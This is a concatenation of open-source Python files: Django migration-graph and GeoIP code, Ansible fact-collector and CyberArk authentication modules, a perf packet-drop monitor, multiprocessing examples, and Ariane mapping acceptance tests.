self.cached = True
node = self.node_map[target]
try:
return node.descendants()
except RuntimeError:
# fallback to iterative dfs
warnings.warn(RECURSION_DEPTH_WARNING, RuntimeWarning)
return self.iterative_dfs(node, forwards=False)
def iterative_dfs(self, start, forwards=True):
"""
Iterative depth first search, for finding dependencies.
"""
visited = deque()
visited.append(start)
if forwards:
stack = deque(sorted(start.parents))
else:
stack = deque(sorted(start.children))
while stack:
node = stack.popleft()
visited.appendleft(node)
if forwards:
children = sorted(node.parents, reverse=True)
else:
children = sorted(node.children, reverse=True)
# reverse sorting is needed because prepending using deque.extendleft
# also effectively reverses values
stack.extendleft(children)
return list(OrderedSet(visited))
def root_nodes(self, app=None):
"""
Returns all root nodes - that is, nodes with no dependencies inside
their app. These are the starting point for an app.
"""
roots = set()
for node in self.nodes:
if (not any(key[0] == node[0] for key in self.node_map[node].parents)
and (not app or app == node[0])):
roots.add(node)
return sorted(roots)
def leaf_nodes(self, app=None):
"""
Returns all leaf nodes - that is, nodes with no dependents in their app.
These are the "most current" version of an app's schema.
Having more than one per app is technically an error, but one that
gets handled further up, in the interactive command - it's usually the
result of a VCS merge and needs some user input.
"""
leaves = set()
for node in self.nodes:
if (not any(key[0] == node[0] for key in self.node_map[node].children)
and (not app or app == node[0])):
leaves.add(node)
return sorted(leaves)
def ensure_not_cyclic(self, start, get_children):
# Algo from GvR:
# http://neopythonic.blogspot.co.uk/2009/01/detecting-cycles-in-directed-graph.html
todo = set(self.nodes)
while todo:
node = todo.pop()
stack = [node]
while stack:
top = stack[-1]
for node in get_children(top):
if node in stack:
cycle = stack[stack.index(node):]
raise CircularDependencyError(", ".join("%s.%s" % n for n in cycle))
if node in todo:
stack.append(node)
todo.remove(node)
break
else:
node = stack.pop()
def __str__(self):
return 'Graph: %s nodes, %s edges' % self._nodes_and_edges()
def __repr__(self):
nodes, edges = self._nodes_and_edges()
return '<%s: nodes=%s, edges=%s>' % (self.__class__.__name__, nodes, edges)
def _nodes_and_edges(self):
return len(self.nodes), sum(len(node.parents) for node in self.node_map.values())
def make_state(self, nodes=None, at_end=True, real_apps=None):
"""
Given a migration node or nodes, returns a complete ProjectState for it.
If at_end is False, returns the state before the migration has run.
If nodes is not provided, returns the overall most current project state.
"""
if nodes is None:
nodes = list(self.leaf_nodes())
if len(nodes) == 0:
return ProjectState()
if not isinstance(nodes[0], tuple):
nodes = [nodes]
plan = []
for node in nodes:
for migration in self.forwards_plan(node):
if migration not in plan:
if not at_end and migration in nodes:
continue
plan.append(migration)
project_state = ProjectState(real_apps=real_apps)
for node in plan:
project_state = self.nodes[node].mutate_state(project_state, preserve=False)
return project_state
def __contains__(self, node):
return node in self.nodes
| bsd-3-clause |
probablytom/tomwallis.net | venv/lib/python2.7/site-packages/django/contrib/gis/geoip/prototypes.py | 93 | 3944 | from ctypes import c_char_p, c_float, c_int, string_at, Structure, POINTER
from django.contrib.gis.geoip.libgeoip import lgeoip, free
#### GeoIP C Structure definitions ####
class GeoIPRecord(Structure):
_fields_ = [('country_code', c_char_p),
('country_code3', c_char_p),
('country_name', c_char_p),
('region', c_char_p),
('city', c_char_p),
('postal_code', c_char_p),
('latitude', c_float),
('longitude', c_float),
# TODO: In 1.4.6 this changed from `int dma_code;` to
# `union {int metro_code; int dma_code;};`. Change
# to a `ctypes.Union` in to accommodate in future when
# pre-1.4.6 versions are no longer distributed.
('dma_code', c_int),
('area_code', c_int),
('charset', c_int),
('continent_code', c_char_p),
]
geoip_char_fields = [name for name, ctype in GeoIPRecord._fields_ if ctype is c_char_p]
GEOIP_DEFAULT_ENCODING = 'iso-8859-1'
geoip_encodings = {
0: 'iso-8859-1',
1: 'utf8',
}
class GeoIPTag(Structure):
pass
RECTYPE = POINTER(GeoIPRecord)
DBTYPE = POINTER(GeoIPTag)
#### ctypes function prototypes ####
# GeoIP_lib_version appeared in version 1.4.7.
if hasattr(lgeoip, 'GeoIP_lib_version'):
GeoIP_lib_version = lgeoip.GeoIP_lib_version
GeoIP_lib_version.argtypes = None
GeoIP_lib_version.restype = c_char_p
else:
GeoIP_lib_version = None
# For freeing memory allocated within a record
GeoIPRecord_delete = lgeoip.GeoIPRecord_delete
GeoIPRecord_delete.argtypes = [RECTYPE]
GeoIPRecord_delete.restype = None
# For retrieving records by name or address.
def check_record(result, func, cargs):
if result:
# Checking the pointer to the C structure, if valid pull out elements
# into a dictionary.
rec = result.contents
record = dict((fld, getattr(rec, fld)) for fld, ctype in rec._fields_)
# Now converting the strings to unicode using the proper encoding.
encoding = geoip_encodings[record['charset']]
for char_field in geoip_char_fields:
if record[char_field]:
record[char_field] = record[char_field].decode(encoding)
# Free the memory allocated for the struct & return.
GeoIPRecord_delete(result)
return record
else:
return None
def record_output(func):
func.argtypes = [DBTYPE, c_char_p]
func.restype = RECTYPE
func.errcheck = check_record
return func
GeoIP_record_by_addr = record_output(lgeoip.GeoIP_record_by_addr)
GeoIP_record_by_name = record_output(lgeoip.GeoIP_record_by_name)
# For opening & closing GeoIP database files.
GeoIP_open = lgeoip.GeoIP_open
GeoIP_open.restype = DBTYPE
GeoIP_delete = lgeoip.GeoIP_delete
GeoIP_delete.argtypes = [DBTYPE]
GeoIP_delete.restype = None
# This is so the string pointer can be freed within Python.
class geoip_char_p(c_char_p):
pass
def check_string(result, func, cargs):
if result:
s = string_at(result)
free(result)
else:
s = ''
return s.decode(GEOIP_DEFAULT_ENCODING)
GeoIP_database_info = lgeoip.GeoIP_database_info
GeoIP_database_info.restype = geoip_char_p
GeoIP_database_info.errcheck = check_string
# String output routines.
def string_output(func):
def _err_check(result, func, cargs):
if result:
return result.decode(GEOIP_DEFAULT_ENCODING)
return result
func.restype = c_char_p
func.errcheck = _err_check
return func
GeoIP_country_code_by_addr = string_output(lgeoip.GeoIP_country_code_by_addr)
GeoIP_country_code_by_name = string_output(lgeoip.GeoIP_country_code_by_name)
GeoIP_country_name_by_addr = string_output(lgeoip.GeoIP_country_name_by_addr)
GeoIP_country_name_by_name = string_output(lgeoip.GeoIP_country_name_by_name)
| artistic-2.0 |
Br1an6/ACS_Netplumber_Implementation | hassel-c/tfmod.py | 7 | 3748 | #!/usr/bin/python
import argparse
import json
import os
from config_parser.transfer_function_to_openflow import OpenFlow_Rule_Generator
from config_parser.cisco_router_parser import cisco_router
from headerspace.tf import TF
from utils.wildcard_utils import set_header_field
from utils.wildcard import wildcard_create_bit_repeat
from utils.helper import dotted_subnet_to_int
OUTPORT_CONST = cisco_router.OUTPUT_PORT_TYPE_CONST * cisco_router.PORT_TYPE_MULTIPLIER
INTER_CONST = cisco_router.INTERMEDIATE_PORT_TYPE_CONST * cisco_router.PORT_TYPE_MULTIPLIER
def get_fwd_port_id(a_port):
return int(a_port / cisco_router.SWITCH_ID_MULTIPLIER) * cisco_router.SWITCH_ID_MULTIPLIER
ofg = OpenFlow_Rule_Generator(None,cisco_router.HS_FORMAT())
def get_openflow_rule(rule,inv_mapf):
in_ports = "in_ports:"
for p in rule["in_ports"]:
in_ports = in_ports + inv_mapf[p] + ","
in_ports = in_ports[0:-1]
out_ports = "out_ports:"
if len(rule["out_ports"]) > 0:
for p in rule["out_ports"]:
out_ports = out_ports + inv_mapf[p] + ","
else:
out_ports = out_ports + "None,"
out_ports = out_ports[0:-1]
of_rule = ofg.parse_rule(rule)
(match,rw) = ofg.pretify(of_rule)
return "%s%s; %s%s;"%(match,in_ports,rw,out_ports)
def get_stage(rule):
if len(rule["in_ports"]) == 0:
return "in"
sample = rule["in_ports"][0]
if sample % cisco_router.SWITCH_ID_MULTIPLIER == 0:
return "mid"
elif sample % cisco_router.SWITCH_ID_MULTIPLIER < cisco_router.PORT_TYPE_MULTIPLIER:
return "in"
else:
return "out"
parser = argparse.ArgumentParser(description='Command line tool to view/edit transfer functions')
parser.add_argument('rtr_name',
help='name of the router to work on its transfer function.')
parser.add_argument("--view", nargs=1, metavar=('table'),
help="view rules in table (table: in/mid/out).")
parser.add_argument("--delete", nargs=2, metavar=('table','rule_index'),
help="delete rule_index from table (table: in/mid/out).")
parser.add_argument("--add", nargs=3, metavar=('table','rule_index','rule'),
help="add to table a rule at index rule_index. rule is a\
comma separated list of field=value or new_filed=new_value.\
example: in_port=te1/1:te2/2,ip_dst=10.0.1.0/24,new_vlan=10,out_port=te1/2.\
field can be vlan, ip_src, ip_dst, ip_proto, transport_src, trnsport_dst.\
in_port and out_port specify the input and output ports, separated by a column.\
table is either in,mid or out.")
parser.add_argument("-m", "--map_file", default="port_map.json",
help="Port map file name.")
parser.add_argument("-p", "--data_path", default=".",
help="Path to where the json transfer function files are stored")
args = parser.parse_args()
f = open("%s/%s"%(args.data_path,args.map_file),'r')
mapf = json.load(f)
inv_mapf = {}
for rtr in mapf:
for port in mapf[rtr]:
inv_mapf[int(mapf[rtr][port])] = "%s-%s"%(rtr,port)
inv_mapf[int(mapf[rtr][port])+OUTPORT_CONST] = "%s-%s"%(rtr,port)
inv_mapf[int(mapf[rtr][port])+INTER_CONST] = "^%s-%s"%(rtr,port)
fwd_id = get_fwd_port_id(int(mapf[rtr][port]))
inv_mapf[fwd_id] = "FWD-ENGINE"
tfs = {}
files_in_dir = os.listdir(args.data_path)
for file_in_dir in files_in_dir:
if file_in_dir.endswith(".tf.json"):
tf = TF(1)
tf.load_from_json("%s/%s"%(args.data_path,file_in_dir))
tfs[file_in_dir[0:-8]] = tf
if args.view:
f = tfs[args.rtr_name]
stage = args.view[0]
i = 1
for rule in f.rules:
if stage == get_stage(rule):
print i,":",get_openflow_rule(rule,inv_mapf)
i = i + 1;
| gpl-2.0 |
MihaiMoldovanu/ansible | lib/ansible/module_utils/facts/system/env.py | 232 | 1170 | # This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.module_utils.six import iteritems
from ansible.module_utils.facts.collector import BaseFactCollector
class EnvFactCollector(BaseFactCollector):
name = 'env'
_fact_ids = set()
def collect(self, module=None, collected_facts=None):
env_facts = {}
env_facts['env'] = {}
for k, v in iteritems(os.environ):
env_facts['env'][k] = v
return env_facts
| gpl-3.0 |
sogelink/ansible | lib/ansible/modules/identity/cyberark/cyberark_authentication.py | 83 | 10846 | #!/usr/bin/python
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cyberark_authentication
short_description: Module for CyberArk Vault Authentication using PAS Web Services SDK
author: Edward Nunez @ CyberArk BizDev (@enunez-cyberark, @cyberark-bizdev, @erasmix)
version_added: 2.4
description:
- Authenticates to CyberArk Vault using Privileged Account Security Web Services SDK and
creates a session fact that can be used by other modules. It returns an Ansible fact
called I(cyberark_session). Every module can use this fact as C(cyberark_session) parameter.
options:
state:
default: present
choices: [present, absent]
description:
- Specifies if an authentication logon/logoff and a cyberark_session should be added/removed.
username:
description:
- The name of the user who will logon to the Vault.
password:
description:
- The password of the user.
new_password:
description:
- The new password of the user. This parameter is optional, and enables you to change a password.
api_base_url:
description:
- A string containing the base URL of the server hosting CyberArk's Privileged Account Security Web Services SDK.
validate_certs:
type: bool
default: 'yes'
description:
- If C(false), SSL certificates will not be validated. This should only
set to C(false) used on personally controlled sites using self-signed
certificates.
use_shared_logon_authentication:
type: bool
default: 'no'
description:
- Whether or not Shared Logon Authentication will be used.
use_radius_authentication:
type: bool
default: 'no'
description:
- Whether or not users will be authenticated via a RADIUS server. Valid values are true/false.
cyberark_session:
description:
- Dictionary set by a CyberArk authentication containing the different values to perform actions on a logged-on CyberArk session.
'''
EXAMPLES = '''
- name: Logon to CyberArk Vault using PAS Web Services SDK - use_shared_logon_authentication
cyberark_authentication:
api_base_url: "{{ web_services_base_url }}"
use_shared_logon_authentication: yes
- name: Logon to CyberArk Vault using PAS Web Services SDK - Not use_shared_logon_authentication
cyberark_authentication:
api_base_url: "{{ web_services_base_url }}"
username: "{{ password_object.password }}"
password: "{{ password_object.passprops.username }}"
use_shared_logon_authentication: no
- name: Logoff from CyberArk Vault
cyberark_authentication:
state: absent
cyberark_session: "{{ cyberark_session }}"
'''
RETURN = '''
cyberark_session:
description: Authentication facts.
returned: success
type: dict
sample:
api_base_url:
description: Base URL for API calls. Returned in the cyberark_session, so it can be used in subsequent calls.
type: string
returned: always
token:
description: The token that identifies the session, encoded in BASE 64.
type: string
returned: always
use_shared_logon_authentication:
description: Whether or not Shared Logon Authentication was used to establish the session.
type: bool
returned: always
validate_certs:
description: Whether or not SSL certificates should be validated.
type: bool
returned: always
'''
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.urls import open_url
from ansible.module_utils.six.moves.urllib.error import HTTPError
import json
try:
import httplib
except ImportError:
# Python 3
import http.client as httplib
def processAuthentication(module):
# Getting parameters from module
api_base_url = module.params["api_base_url"]
validate_certs = module.params["validate_certs"]
username = module.params["username"]
password = module.params["password"]
new_password = module.params["new_password"]
use_shared_logon_authentication = module.params[
"use_shared_logon_authentication"]
use_radius_authentication = module.params["use_radius_authentication"]
state = module.params["state"]
cyberark_session = module.params["cyberark_session"]
# if in check mode it will not perform password changes
if module.check_mode and new_password is not None:
new_password = None
# Defining initial values for open_url call
headers = {'Content-Type': 'application/json'}
payload = ""
if state == "present": # Logon Action
# Different end_points based on the use of shared logon authentication
if use_shared_logon_authentication:
end_point = "/PasswordVault/WebServices/auth/Shared/RestfulAuthenticationService.svc/Logon"
else:
end_point = "/PasswordVault/WebServices/auth/Cyberark/CyberArkAuthenticationService.svc/Logon"
# The payload will contain username, password
# and optionally use_radius_authentication and new_password
payload_dict = {"username": username, "password": password}
if use_radius_authentication:
payload_dict["useRadiusAuthentication"] = use_radius_authentication
if new_password is not None:
payload_dict["newPassword"] = new_password
payload = json.dumps(payload_dict)
else: # Logoff Action
# Get values from cyberark_session already established
api_base_url = cyberark_session["api_base_url"]
validate_certs = cyberark_session["validate_certs"]
use_shared_logon_authentication = cyberark_session[
"use_shared_logon_authentication"]
headers["Authorization"] = cyberark_session["token"]
# Different end_points based on the use of shared logon authentication
if use_shared_logon_authentication:
end_point = "/PasswordVault/WebServices/auth/Shared/RestfulAuthenticationService.svc/Logoff"
else:
end_point = "/PasswordVault/WebServices/auth/Cyberark/CyberArkAuthenticationService.svc/Logoff"
result = None
changed = False
response = None
try:
response = open_url(
api_base_url + end_point,
method="POST",
headers=headers,
data=payload,
validate_certs=validate_certs)
except (HTTPError, httplib.HTTPException) as http_exception:
module.fail_json(
msg=("Error while performing authentication."
"Please validate parameters provided, and ability to logon to CyberArk."
"\n*** end_point=%s%s\n ==> %s" % (api_base_url, end_point, to_text(http_exception))),
payload=payload,
headers=headers,
status_code=http_exception.code)
except Exception as unknown_exception:
module.fail_json(
msg=("Unknown error while performing authentication."
"\n*** end_point=%s%s\n%s" % (api_base_url, end_point, to_text(unknown_exception))),
payload=payload,
headers=headers,
status_code=-1)
if response.getcode() == 200: # Success
if state == "present": # Logon Action
# Result token from REST Api uses a different key based
# the use of shared logon authentication
token = None
try:
if use_shared_logon_authentication:
token = json.loads(response.read())["LogonResult"]
else:
token = json.loads(response.read())["CyberArkLogonResult"]
except Exception as e:
module.fail_json(
msg="Error obtaining token\n%s" % (to_text(e)),
payload=payload,
headers=headers,
status_code=-1)
# Preparing result of the module
result = {
"cyberark_session": {
"token": token, "api_base_url": api_base_url, "validate_certs": validate_certs,
"use_shared_logon_authentication": use_shared_logon_authentication},
}
if new_password is not None:
# Only marks change if new_password was received resulting
# in a password change
changed = True
else: # Logoff Action clears cyberark_session
result = {
"cyberark_session": {}
}
return (changed, result, response.getcode())
else:
module.fail_json(
msg="error in end_point=>" +
end_point,
headers=headers)
def main():
fields = {
"api_base_url": {"type": "str"},
"validate_certs": {"type": "bool",
"default": "true"},
"username": {"type": "str"},
"password": {"type": "str", "no_log": True},
"new_password": {"type": "str", "no_log": True},
"use_shared_logon_authentication": {"default": False, "type": "bool"},
"use_radius_authentication": {"default": False, "type": "bool"},
"state": {"type": "str",
"choices": ["present", "absent"],
"default": "present"},
"cyberark_session": {"type": "dict"},
}
mutually_exclusive = [
["use_shared_logon_authentication", "use_radius_authentication"],
["use_shared_logon_authentication", "new_password"],
["api_base_url", "cyberark_session"],
["cyberark_session", "username", "use_shared_logon_authentication"]
]
required_if = [
("state", "present", ["api_base_url"]),
("state", "absent", ["cyberark_session"])
]
required_together = [
["username", "password"]
]
module = AnsibleModule(
argument_spec=fields,
mutually_exclusive=mutually_exclusive,
required_if=required_if,
required_together=required_together,
supports_check_mode=True)
(changed, result, status_code) = processAuthentication(module)
module.exit_json(
changed=changed,
ansible_facts=result,
status_code=status_code)
if __name__ == '__main__':
main()
| gpl-3.0 |
malvira/lpc31xx | tools/perf/scripts/python/net_dropmonitor.py | 4235 | 1554 | # Monitor the system for dropped packets and proudce a report of drop locations and counts
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
drop_log = {}
kallsyms = []
def get_kallsyms_table():
global kallsyms
try:
f = open("/proc/kallsyms", "r")
linecount = 0
for line in f:
linecount = linecount+1
f.seek(0)
except:
return
j = 0
for line in f:
loc = int(line.split()[0], 16)
name = line.split()[2]
j = j +1
if ((j % 100) == 0):
print "\r" + str(j) + "/" + str(linecount),
kallsyms.append({ 'loc': loc, 'name' : name})
print "\r" + str(j) + "/" + str(linecount)
kallsyms.sort()
return
def get_sym(sloc):
loc = int(sloc)
for i in kallsyms:
if (i['loc'] >= loc):
return (i['name'], i['loc']-loc)
return (None, 0)
def print_drop_table():
print "%25s %25s %25s" % ("LOCATION", "OFFSET", "COUNT")
for i in drop_log.keys():
(sym, off) = get_sym(i)
if sym == None:
sym = i
print "%25s %25s %25s" % (sym, off, drop_log[i])
def trace_begin():
print "Starting trace (Ctrl-C to dump results)"
def trace_end():
print "Gathering kallsyms data"
get_kallsyms_table()
print_drop_table()
# called from perf, when it finds a correspoinding event
def skb__kfree_skb(name, context, cpu, sec, nsec, pid, comm,
skbaddr, protocol, location):
slocation = str(location)
try:
drop_log[slocation] = drop_log[slocation] + 1
except:
drop_log[slocation] = 1
| gpl-2.0 |
hortonworks/hortonworks-sandbox | desktop/core/ext-py/processing/examples/ex_synchronize.py | 3 | 6159 | #
# A test file for the `processing` package
#
import time, sys, random
from Queue import Empty
import processing # may get overwritten
#### TEST_VALUE
def value_func(running, mutex):
random.seed()
time.sleep(random.random()*4)
mutex.acquire()
print '\n\t\t\t' + str(processing.currentProcess()) + ' has finished'
running.value -= 1
mutex.release()
def test_value():
TASKS = 10
running = processing.Value('i', TASKS)
mutex = processing.Lock()
for i in range(TASKS):
processing.Process(target=value_func, args=(running, mutex)).start()
while running.value > 0:
time.sleep(0.08)
mutex.acquire()
print running.value,
sys.stdout.flush()
mutex.release()
print
print 'No more running processes'
#### TEST_QUEUE
def queue_func(queue):
for i in range(30):
time.sleep(0.5 * random.random())
queue.put(i*i)
queue.put('STOP')
def test_queue():
q = processing.Queue()
p = processing.Process(target=queue_func, args=(q,))
p.start()
o = None
while o != 'STOP':
try:
o = q.get(timeout=0.3)
print o,
sys.stdout.flush()
except Empty:
print 'TIMEOUT'
print
#### TEST_CONDITION
def condition_func(cond):
cond.acquire()
print '\t' + str(cond)
time.sleep(2)
print '\tchild is notifying'
print '\t' + str(cond)
cond.notify()
cond.release()
def test_condition():
cond = processing.Condition()
p = processing.Process(target=condition_func, args=(cond,))
print cond
cond.acquire()
print cond
cond.acquire()
print cond
p.start()
print 'main is waiting'
cond.wait()
print 'main has woken up'
print cond
cond.release()
print cond
cond.release()
p.join()
print cond
#### TEST_SEMAPHORE
def semaphore_func(sema, mutex, running):
sema.acquire()
mutex.acquire()
running.value += 1
print running.value, 'tasks are running'
mutex.release()
random.seed()
time.sleep(random.random()*2)
mutex.acquire()
running.value -= 1
print '%s has finished' % processing.currentProcess()
mutex.release()
sema.release()
def test_semaphore():
sema = processing.Semaphore(3)
mutex = processing.RLock()
running = processing.Value('i', 0)
processes = [
processing.Process(target=semaphore_func, args=(sema, mutex, running))
for i in range(10)
]
for p in processes:
p.start()
for p in processes:
p.join()
#### TEST_JOIN_TIMEOUT
def join_timeout_func():
print '\tchild sleeping'
time.sleep(5.5)
print '\n\tchild terminating'
def test_join_timeout():
p = processing.Process(target=join_timeout_func)
p.start()
print 'waiting for process to finish'
while 1:
p.join(timeout=1)
if not p.isAlive():
break
print '.',
sys.stdout.flush()
#### TEST_EVENT
def event_func(event):
print '\t%r is waiting' % processing.currentProcess()
event.wait()
print '\t%r has woken up' % processing.currentProcess()
def test_event():
event = processing.Event()
processes = [processing.Process(target=event_func, args=(event,))
for i in range(5)]
for p in processes:
p.start()
print 'main is sleeping'
time.sleep(2)
print 'main is setting event'
event.set()
for p in processes:
p.join()
#### TEST_SHAREDVALUES
def sharedvalues_func(values, arrays, shared_values, shared_arrays):
for i in range(len(values)):
v = values[i][1]
sv = shared_values[i].value
assert v == sv
for i in range(len(values)):
a = arrays[i][1]
sa = list(shared_arrays[i][:])
assert a == sa
print 'Tests passed'
def test_sharedvalues():
values = [
('i', 10),
('h', -2),
('d', 1.25)
]
arrays = [
('i', range(100)),
('d', [0.25 * i for i in range(100)]),
('H', range(1000))
]
shared_values = [processing.Value(id, v) for id, v in values]
shared_arrays = [processing.Array(id, a) for id, a in arrays]
p = processing.Process(
target=sharedvalues_func,
args=(values, arrays, shared_values, shared_arrays)
)
p.start()
p.join()
assert p.getExitCode() == 0
####
def test(namespace=processing):
global processing
processing = namespace
for func in [ test_value, test_queue, test_condition,
test_semaphore, test_join_timeout, test_event,
test_sharedvalues ]:
print '\n\t######## %s\n' % func.__name__
func()
ignore = processing.activeChildren() # cleanup any old processes
if hasattr(processing, '_debugInfo'):
info = processing._debugInfo()
if info:
print info
raise ValueError, 'there should be no positive refcounts left'
if __name__ == '__main__':
processing.freezeSupport()
assert len(sys.argv) in (1, 2)
if len(sys.argv) == 1 or sys.argv[1] == 'processes':
print ' Using processes '.center(79, '-')
namespace = processing
elif sys.argv[1] == 'manager':
print ' Using processes and a manager '.center(79, '-')
namespace = processing.Manager()
namespace.Process = processing.Process
namespace.currentProcess = processing.currentProcess
namespace.activeChildren = processing.activeChildren
elif sys.argv[1] == 'threads':
print ' Using threads '.center(79, '-')
import processing.dummy as namespace
else:
print 'Usage:\n\t%s [processes | manager | threads]' % sys.argv[0]
raise SystemExit, 2
test(namespace)
| apache-2.0 |
echinopsii/net.echinopsii.ariane.community.cli.python3 | tests/acceptance/mapping/endpoint_nats_at.py | 1 | 19692 | # Ariane CLI Python 3
# Endpoint acceptance tests
#
# Copyright (C) 2015 echinopsii
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import unittest
from ariane_clip3.driver_factory import DriverFactory
from ariane_clip3.mapping import MappingService, Node, Container, Endpoint, EndpointService, SessionService
__author__ = 'mffrench'
class EndpointTest(unittest.TestCase):
mapping_service = None
container1 = None
node1 = None
@classmethod
def setUpClass(cls):
client_properties = {
'product': 'Ariane CLI Python 3',
'information': 'Ariane - Mapping Endpoint Test',
'ariane.pgurl': 'ssh://' + socket.gethostname(),
'ariane.osi': 'localhost',
'ariane.otm': 'ArianeOPS',
'ariane.app': 'Ariane',
'ariane.cmp': 'echinopsii'
}
args = {'type': 'NATS', 'user': 'ariane', 'password': 'password', 'host': 'localhost',
'port': 4222, 'rpc_timeout': 10, 'rpc_retry': 2, 'client_properties': client_properties}
cls.mapping_service = MappingService(args)
cls.container1 = Container(name="test_node_container1", gate_uri="ssh://my_host/docker/test_node_container1",
primary_admin_gate_name="container name space (pid)", company="Docker",
product="Docker", c_type="container")
cls.container1.save()
cls.node1 = Node(name="mysqld", container_id=cls.container1.id)
cls.node1.save()
@classmethod
def tearDownClass(cls):
cls.node1.remove()
cls.container1.remove()
cls.mapping_service.stop()
def test_create_remove_endpoint_basic(self):
endpoint = Endpoint(url="mysql://test_create_remove_endpoint_basic:4385", parent_node_id=self.node1.id)
endpoint.save()
self.assertIsNotNone(endpoint.id)
self.node1.sync()
self.assertTrue(endpoint.id in self.node1.endpoints_id)
self.assertIsNone(endpoint.remove())
self.node1.sync()
self.assertFalse(endpoint.id in self.node1.endpoints_id)
def test_create_remove_endpoint_parent_node(self):
container2 = Container(name="test_create_remove_endpoint_parent_node_container2",
gate_uri="ssh://my_host/docker/test_create_remove_endpoint_parent_node_container2",
primary_admin_gate_name="container name space (pid)", company="Docker",
product="Docker", c_type="container")
node2 = Node(name="mysqld", container=container2)
node2.save()
endpoint2 = Endpoint(url="mysql://test_create_remove_endpoint_parent_node_container2:4385", parent_node=node2)
endpoint2.save()
self.assertIsNotNone(endpoint2.id)
self.assertTrue(endpoint2.id in node2.endpoints_id)
self.assertIsNone(endpoint2.remove())
self.assertFalse(endpoint2.id in node2.endpoints_id)
node2.remove()
container2.remove()
def test_find_endpoint_by_id(self):
endpoint = Endpoint(url="mysql://test_find_endpoint_by_id_container1:4385", parent_node_id=self.node1.id)
endpoint.save()
self.assertIsNotNone(EndpointService.find_endpoint(eid=endpoint.id))
endpoint.remove()
self.assertIsNone(EndpointService.find_endpoint(eid=endpoint.id))
def test_find_endpoint_by_url(self):
endpoint = Endpoint(url="mysql://test_find_endpoint_by_url_container1:4385", parent_node_id=self.node1.id)
endpoint.save()
self.assertIsNotNone(EndpointService.find_endpoint(url=endpoint.url))
endpoint.remove()
self.assertIsNone(EndpointService.find_endpoint(url=endpoint.url))
def test_find_endpoint_by_selector(self):
endpoint = Endpoint(url="mysql://test_find_endpoint_by_selector_container1:4385", parent_node_id=self.node1.id)
endpoint.save()
self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'"))
self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", cid=self.container1.id))
self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", nid=self.node1.id))
endpoint.remove()
self.assertIsNone(EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'"))
def test_get_endpoints(self):
endpoint = Endpoint(url="mysql://test_get_endpoints_container1:4385", parent_node_id=self.node1.id)
endpoint.save()
self.assertTrue(endpoint in EndpointService.get_endpoints())
endpoint.remove()
self.assertFalse(endpoint in EndpointService.get_endpoints())
def test_endpoint_properties(self):
endpoint = Endpoint(url="mysql://test_endpoint_properties_container1:4385", parent_node_id=self.node1.id)
endpoint.add_property(('int_prop', 10), sync=False)
endpoint.add_property(('long_prop', 10000000), sync=False)
endpoint.add_property(('double_prop', 3.1414), sync=False)
endpoint.add_property(('boolean_prop', True), sync=False)
endpoint.add_property(('string_prop', "value"), sync=False)
datacenter = {"dc": "Sagittarius", "gpsLng": 2.251088, "address": "2 rue Baudin", "gpsLat": 48.895345,
"town": "Courbevoie", "country": "France"}
endpoint.add_property(('map_prop_datacenter', datacenter), sync=False)
endpoint.add_property(('array_prop', [1, 2, 3, 4, 5]), sync=False)
self.assertIsNone(endpoint.properties)
endpoint.save()
self.assertTrue('boolean_prop' in endpoint.properties)
self.assertTrue('double_prop' in endpoint.properties)
self.assertTrue('int_prop' in endpoint.properties)
self.assertTrue('long_prop' in endpoint.properties)
self.assertTrue('map_prop_datacenter' in endpoint.properties)
self.assertTrue('string_prop' in endpoint.properties)
self.assertTrue('array_prop' in endpoint.properties)
endpoint.del_property('int_prop', sync=False)
endpoint.del_property('long_prop', sync=False)
endpoint.del_property('double_prop', sync=False)
endpoint.del_property('boolean_prop', sync=False)
endpoint.del_property('string_prop', sync=False)
endpoint.del_property('map_prop_datacenter', sync=False)
endpoint.del_property('array_prop', sync=False)
self.assertTrue('boolean_prop' in endpoint.properties)
self.assertTrue('double_prop' in endpoint.properties)
self.assertTrue('int_prop' in endpoint.properties)
self.assertTrue('long_prop' in endpoint.properties)
self.assertTrue('map_prop_datacenter' in endpoint.properties)
self.assertTrue('string_prop' in endpoint.properties)
self.assertTrue('array_prop' in endpoint.properties)
endpoint.save()
self.assertFalse(endpoint.properties is not None and 'boolean_prop' in endpoint.properties)
self.assertFalse(endpoint.properties is not None and 'double_prop' in endpoint.properties)
self.assertFalse(endpoint.properties is not None and 'int_prop' in endpoint.properties)
self.assertFalse(endpoint.properties is not None and 'long_prop' in endpoint.properties)
self.assertFalse(endpoint.properties is not None and 'map_prop_datacenter' in endpoint.properties)
self.assertFalse(endpoint.properties is not None and 'string_prop' in endpoint.properties)
self.assertFalse(endpoint.properties is not None and 'array_prop' in endpoint.properties)
endpoint.remove()
def test_twin_endpoints_link(self):
container2 = Container(name="test_twin_endpoints_link_container2",
gate_uri="ssh://my_host/docker/test_twin_endpoints_link_container2",
